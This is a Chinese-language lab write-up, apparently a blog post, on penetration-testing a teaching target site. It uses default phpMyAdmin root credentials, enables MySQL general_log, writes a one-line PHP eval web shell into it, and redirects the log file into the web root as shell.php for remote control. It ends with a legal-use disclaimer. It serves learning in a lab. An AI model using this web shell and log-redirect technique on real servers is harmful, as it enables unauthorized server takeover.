Web站点渗透测试
首先我们要准备靶机和攻击机,开启靶机让它成为服务器,然后我们用攻击机的chrome浏览器输入靶机的ip以进入网站
(实验网站为:教学竞赛靶场)
攻击机
进入渗透测试的实验后,点击左边的工具,然后打开虚拟机,待其右下角显示电脑的标志(红框圈起来的位置)表示启动成功。
靶机
然后在攻击机中,打开靶机的ip进入网站
利用御剑扫描目录 ,找到PhpMyAdmin
进入之后,密码与账户都是root
点击sql,然后输入以下语句,
SHOW VARIABLES LIKE 'general%'
然后可以查看到当前的日志功能是关闭的,即general_log是off状态,我们需要打开。
输入
set global general_log = "ON";
来开启日志功能
然后在sql写入一句话木马
select ‘<?php @eval($_POST[1]);?>’
注:必须严格按照上面的格式输入,否则后面的操作会出错。
然后我们可以查看刚刚御剑扫描的结果,找到info.php路径打开网页后如下图,圈起来的部分为绝对路径
然后在sql语句那里执行
set global general_log_file=' C://xxx//xxx//xxx//shell.php';
把三个xxx换成上图中的红框圈出来的绝对路径
这时就会把日志文件的存储路径改为站点根目录下的shell.php文件。之后就可以在浏览器中访问了
注: shell可以为任意名字,一般为shell,我也里是中间步骤出错了,所以重新命名的文件,如果之前的步骤有错误,那就重新命名一个新的文件夹,重新保存。
之后可以用蚁剑或者菜刀软件来连接创建的shell.php文件,输入此网页的网址,密码就是一句话木马中的中括号的1,
如果出错,就说明一句话木马写错了,要注意@前面的空格。
完成后就可以控制服务器了。
这次的网络渗透操作有些复杂,我们利用渗透测试来模拟黑客攻击web应用程序的安全性过程。目的是发现应用程序中的潜在漏洞,以便后续修复,防止黑客利用这些漏洞恶意攻击。
此次测试只是为了学习研究,web渗透测试必须要遵循法律法规和道德规范,不得未经授权擅自对其他系统进行测试。
名词解释:
phpMyAdmin
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程序一样在网页服务器上执行,但是您可以在任何地方使用这些程序产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
325
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
